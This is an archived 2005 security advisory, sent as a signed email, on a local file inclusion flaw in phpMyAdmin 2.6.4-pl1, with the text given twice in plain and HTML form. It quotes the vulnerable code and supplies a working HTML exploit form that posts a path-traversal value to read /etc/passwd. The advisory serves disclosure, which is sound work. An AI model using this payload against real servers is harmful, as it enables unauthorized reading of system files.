phpMyAdminLocal.txt

2005-10-11T00:00:00
ID PACKETSTORM:40569
Type packetstorm
Reporter Maksymilian Arciemowicz
Modified 2005-10-11T00:00:00

Description

                                        
                                            `--Boundary-00=_A/oSDPpggmc0vcj  
Content-Type: text/plain;  
charset="us-ascii"  
Content-Transfer-Encoding: 7bit  
  
-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
[phpMyAdmin Local file inclusion 2.6.4-pl1]  
  
Author: Maksymilian Arciemowicz ( cXIb8O3 ).18  
Date: 10.10.2005  
from SECURITYREASON.COM  
  
- --- 0.Description ---  
phpMyAdmin 2.6.4 is a tool written in PHP intended to  
handle the administration of MySQL over the Web.  
Currently it can create and drop databases,  
create/drop/alter tables, delete/edit/add fields,  
execute any SQL statement, manage keys on fields.  
blablabla...  
phpMyAdmin is very dangerous script.  
  
- --- 1. Local file inclusion (Critical) ---  
File: ./libraries/grab_globals.lib.php  
  
This file is included by many files. Example file index.php  
  
- -index.php--  
<?php  
/* $Id: index.php,v 2.14 2004/10/19 17:23:09 nijel Exp $ */  
// vim: expandtab sw=4 ts=4 sts=4:  
  
/**  
* Gets core libraries and defines some variables  
*/  
require_once('./libraries/grab_globals.lib.php');  
require_once('./libraries/common.lib.php');  
...  
- -index.php--  
  
ok so. In ./libraries/grab_globals.lib.php we have:  
  
- -101-104-grab_globals.lib.php---------  
if ( ! empty( $__redirect ) ) {  
require('./' . $__redirect);  
exit();  
} // end if ( ! empty( $__redirect ) )  
- -101-104-grab_globals.lib.php---------  
  
But before we have  
  
- -53-67-grab_globals.lib.php-----------  
// check if a subform is submitted  
$__redirect = NULL;  
if ( isset( $_POST['usesubform'] ) ) {  
// if a subform is present and should be used  
// the rest of the form is deprecated  
$subform_id = key( $_POST['usesubform'] );  
$subform = $_POST['subform'][$subform_id];  
$_POST = $subform;  
if ( isset( $_POST['redirect'] )   
&& $_POST['redirect'] != basename( $_SERVER['PHP_SELF'] ) ) {  
$__redirect = $_POST['redirect'];  
unset( $_POST['redirect'] );  
} // end if ( isset( $_POST['redirect'] ) )  
} // end if ( isset( $_POST['usesubform'] ) )  
// end check if a subform is submitted  
- -53-67-grab_globals.lib.php-----------  
  
If varible $_POST['usesubform'] exists and is array, that we can created new varibles for $_POST (example $_POST['redirect']).  
  
$subform = $_POST['subform'][$subform_id];  
$_POST = $subform;  
  
where array $_POST = array $_POST[subform][1]  
that  
$_POST['redirect']=$_POST[subform][1][redirect]  
  
and we have local file inclusion.  
  
Example response in html:  
  
- -Exploit---  
<CENTER>  
<A HREF="http://www.securityreason.com><IMG SRC="http://securityreason.com/gfx/small_logo.png"></A><P>  
<FORM action="http://localhost/phpMyAdmin-2.6.4-pl1/index.php" method=post enctype="multipart/form-data">  
<input TYPE="hidden" name="usesubform[1]" value="1">  
<input TYPE="hidden" name="usesubform[2]" value="1">  
<input TYPE="text" name="subform[1][redirect]" value="../../../../../../../etc/passwd" size=30> File<p>  
<input TYPE="hidden" name="subform[1][cXIb8O3]" value="1">  
<input TYPE="submit" value="Exploit">  
</FORM>  
- -Exploit---  
  
Exploit:  
http://securityreason.com/achievement_exploitalert/2  
  
- --- 2. Greets ---  
  
sp3x  
  
- --- 3.Contact ---  
Author: Maksymilian Arciemowicz < cXIb8O3 >  
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com  
GPG-KEY: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg  
WWW: http://securityreason.com  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.2 (FreeBSD)  
  
iD8DBQFDSnd/3Ke13X/fTO4RAse3AKCAT3s7bzwySDsGHqYN0+Vm+D+OiwCdFf/T  
cvqCRiRlK9XrQGvV3sYxzXQ=  
=yoDY  
-----END PGP SIGNATURE-----  
  
--Boundary-00=_A/oSDPpggmc0vcj  
Content-Type: text/html;  
charset="us-ascii"  
Content-Transfer-Encoding: 7bit  
  
<html><head><meta name="qrichtext" content="1" /></head><body style="font-size:12pt;font-family:Luxi Mono">  
<p>-----BEGIN PGP SIGNED MESSAGE-----</p>  
<p>Hash: SHA1</p>  
<p></p>  
<p>[phpMyAdmin Local file inclusion 2.6.4-pl1]</p>  
<p></p>  
<p>Author: Maksymilian Arciemowicz ( cXIb8O3 ).18</p>  
<p>Date: 10.10.2005</p>  
<p>from SECURITYREASON.COM</p>  
<p></p>  
<p>- --- 0.Description ---</p>  
<p>phpMyAdmin 2.6.4 is a tool written in PHP intended to</p>  
<p>handle the administration of MySQL over the Web.</p>  
<p>Currently it can create and drop databases,</p>  
<p>create/drop/alter tables, delete/edit/add fields,</p>  
<p>execute any SQL statement, manage keys on fields.</p>  
<p>blablabla...</p>  
<p>phpMyAdmin is very dangerous script.</p>  
<p></p>  
<p>- --- 1. Local file inclusion (Critical) ---</p>  
<p>File: ./libraries/grab_globals.lib.php</p>  
<p></p>  
<p>This file is included by many files. Example file index.php</p>  
<p></p>  
<p>- -index.php--</p>  
<p><?php</p>  
<p>/* $Id: index.php,v 2.14 2004/10/19 17:23:09 nijel Exp $ */</p>  
<p>// vim: expandtab sw=4 ts=4 sts=4:</p>  
<p></p>  
<p>/**</p>  
<p> * Gets core libraries and defines some variables</p>  
<p> */</p>  
<p>require_once('./libraries/grab_globals.lib.php');</p>  
<p>require_once('./libraries/common.lib.php');</p>  
<p>...</p>  
<p>- -index.php--</p>  
<p></p>  
<p>ok so. In ./libraries/grab_globals.lib.php we have:</p>  
<p></p>  
<p>- -101-104-grab_globals.lib.php---------</p>  
<p>if ( ! empty( $__redirect ) ) {</p>  
<p> require('./' . $__redirect);</p>  
<p> exit();</p>  
<p>} // end if ( ! empty( $__redirect ) )</p>  
<p>- -101-104-grab_globals.lib.php---------</p>  
<p></p>  
<p>But before we have</p>  
<p></p>  
<p>- -53-67-grab_globals.lib.php-----------</p>  
<p>// check if a subform is submitted</p>  
<p>$__redirect = NULL;</p>  
<p>if ( isset( $_POST['usesubform'] ) ) {</p>  
<p> // if a subform is present and should be used</p>  
<p> // the rest of the form is deprecated</p>  
<p> $subform_id = key( $_POST['usesubform'] );</p>  
<p> $subform = $_POST['subform'][$subform_id];</p>  
<p> $_POST = $subform;</p>  
<p> if ( isset( $_POST['redirect'] ) </p>  
<p> && $_POST['redirect'] != basename( $_SERVER['PHP_SELF'] ) ) {</p>  
<p> $__redirect = $_POST['redirect'];</p>  
<p> unset( $_POST['redirect'] );</p>  
<p> } // end if ( isset( $_POST['redirect'] ) )</p>  
<p>} // end if ( isset( $_POST['usesubform'] ) )</p>  
<p>// end check if a subform is submitted</p>  
<p>- -53-67-grab_globals.lib.php-----------</p>  
<p></p>  
<p>If varible $_POST['usesubform'] exists and is array, that we can created new varibles for $_POST (example $_POST['redirect']).</p>  
<p></p>  
<p> $subform = $_POST['subform'][$subform_id];</p>  
<p> $_POST = $subform;</p>  
<p></p>  
<p>where array $_POST = array $_POST[subform][1]</p>  
<p>that</p>  
<p>$_POST['redirect']=$_POST[subform][1][redirect]</p>  
<p></p>  
<p>and we have local file inclusion.</p>  
<p></p>  
<p>Example response in html:</p>  
<p></p>  
<p>- -Exploit---</p>  
<p><CENTER></p>  
<p><A HREF="http://www.securityreason.com><IMG SRC="http://securityreason.com/gfx/small_logo.png"></A><P></p>  
<p><FORM action="http://localhost/phpMyAdmin-2.6.4-pl1/index.php" method=post enctype="multipart/form-data"></p>  
<p><input TYPE="hidden" name="usesubform[1]" value="1"></p>  
<p><input TYPE="hidden" name="usesubform[2]" value="1"></p>  
<p><input TYPE="text" name="subform[1][redirect]" value="../../../../../../../etc/passwd" size=30> File<p></p>  
<p><input TYPE="hidden" name="subform[1][cXIb8O3]" value="1"></p>  
<p><input TYPE="submit" value="Exploit"></p>  
<p></FORM></p>  
<p>- -Exploit---</p>  
<p></p>  
<p>Exploit:</p>  
<p>http://securityreason.com/achievement_exploitalert/2</p>  
<p></p>  
<p>- --- 2. Greets ---</p>  
<p></p>  
<p>sp3x</p>  
<p></p>  
<p>- --- 3.Contact ---</p>  
<p>Author: Maksymilian Arciemowicz < cXIb8O3 ></p>  
<p>Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com</p>  
<p>GPG-KEY: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg</p>  
<p>WWW: http://securityreason.com</p>  
<p>-----BEGIN PGP SIGNATURE-----</p>  
<p>Version: GnuPG v1.4.2 (FreeBSD)</p>  
<p></p>  
<p>iD8DBQFDSnd/3Ke13X/fTO4RAse3AKCAT3s7bzwySDsGHqYN0+Vm+D+OiwCdFf/T</p>  
<p>cvqCRiRlK9XrQGvV3sYxzXQ=</p>  
<p>=yoDY</p>  
<p>-----END PGP SIGNATURE-----</p>  
<p></p>  
</body></html>  
--Boundary-00=_A/oSDPpggmc0vcj--  
`